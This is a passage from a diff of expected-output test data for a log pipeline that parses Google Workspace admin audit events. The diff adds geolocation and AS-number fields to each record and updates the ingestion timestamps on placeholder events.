"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "CHANGE_PRIMARY_DOMAIN", @@ -1507,6 +1783,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1516,7 +1804,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915873300Z", + "ingested": "2021-12-14T14:44:24.297926617Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_WHITELIST_SETTING", @@ -1572,6 +1860,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1581,7 +1881,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915879100Z", + "ingested": "2021-12-14T14:44:24.297926947Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "COMMUNICATION_PREFERENCES_SETTING_CHANGE", 
@@ -1637,6 +1937,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1646,7 +1958,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915884800Z", + "ingested": "2021-12-14T14:44:24.297927277Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_CONFLICT_ACCOUNT_ACTION", @@ -1701,6 +2013,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1710,7 +2034,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915890600Z", + "ingested": "2021-12-14T14:44:24.297927705Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_FEEDBACK_SOLICITATION", @@ -1766,6 +2090,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1775,7 +2111,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915896400Z", + "ingested": "2021-12-14T14:44:24.297928047Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_CONTACT_SHARING", 
@@ -1831,6 +2167,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1840,7 +2188,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915900600Z",
+ "ingested": "2021-12-14T14:44:24.297928380Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
 "provider": "admin",
 "action": "CREATE_PLAY_FOR_WORK_TOKEN",
@@ -1895,6 +2243,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1904,7 +2264,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915905300Z",
+ "ingested": "2021-12-14T14:44:24.297928742Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_USE_CUSTOM_LOGO",
@@ -1960,6 +2320,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1969,7 +2341,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915910500Z",
+ "ingested": "2021-12-14T14:44:24.297929078Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "provider": "admin",
 "action": "CHANGE_CUSTOM_LOGO",
@@ -2022,6 +2394,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2031,7 +2415,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915915800Z",
+ "ingested": "2021-12-14T14:44:24.297929483Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DATA_LOCALIZATION_FOR_RUSSIA",
@@ -2084,6 +2468,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2093,7 +2489,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915920600Z",
+ "ingested": "2021-12-14T14:44:24.297929839Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DATA_LOCALIZATION_SETTING",
@@ -2147,6 +2543,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2156,7 +2564,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915924200Z",
+ "ingested": "2021-12-14T14:44:24.297930182Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO",
@@ -2211,6 +2619,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2220,7 +2640,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915928800Z",
+ "ingested": "2021-12-14T14:44:24.297930623Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
 "provider": "admin",
 "action": "DELETE_PLAY_FOR_WORK_TOKEN",
@@ -2275,6 +2695,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2284,7 +2716,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915933200Z",
+ "ingested": "2021-12-14T14:44:24.297931028Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "provider": "admin",
 "action": "VIEW_DNS_LOGIN_DETAILS",
@@ -2339,6 +2771,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2348,7 +2792,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915938Z",
+ "ingested": "2021-12-14T14:44:24.297931357Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DOMAIN_DEFAULT_LOCALE",
@@ -2403,6 +2847,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2412,7 +2868,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915942500Z",
+ "ingested": "2021-12-14T14:44:24.297931699Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DOMAIN_DEFAULT_TIMEZONE",
@@ -2467,6 +2923,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2476,7 +2944,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915946900Z",
+ "ingested": "2021-12-14T14:44:24.297932033Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DOMAIN_NAME",
@@ -2531,6 +2999,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2540,7 +3020,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915950700Z",
+ "ingested": "2021-12-14T14:44:24.297932357Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_ENABLE_PRE_RELEASE_FEATURES",
@@ -2595,6 +3075,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2604,7 +3096,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915954800Z",
+ "ingested": "2021-12-14T14:44:24.297932819Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DOMAIN_SUPPORT_MESSAGE",
@@ -2659,6 +3151,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2668,7 +3172,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915959500Z",
+ "ingested": "2021-12-14T14:44:24.297933157Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "provider": "admin",
 "action": "ADD_TRUSTED_DOMAINS",
@@ -2723,6 +3227,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2732,7 +3248,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915963600Z",
+ "ingested": "2021-12-14T14:44:24.297933488Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "provider": "admin",
 "action": "REMOVE_TRUSTED_DOMAINS",
@@ -2787,6 +3303,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2796,7 +3324,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915968700Z",
+ "ingested": "2021-12-14T14:44:24.297933832Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_EDU_TYPE",
@@ -2851,6 +3379,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2860,7 +3400,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915974600Z",
+ "ingested": "2021-12-14T14:44:24.297934163Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_ENABLE_OAUTH_CONSUMER_KEY",
@@ -2916,6 +3456,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2925,7 +3477,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915980300Z",
+ "ingested": "2021-12-14T14:44:24.297934570Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_SSO_ENABLED",
@@ -2981,6 +3533,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -2990,7 +3554,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915986300Z",
+ "ingested": "2021-12-14T14:44:24.297934914Z",
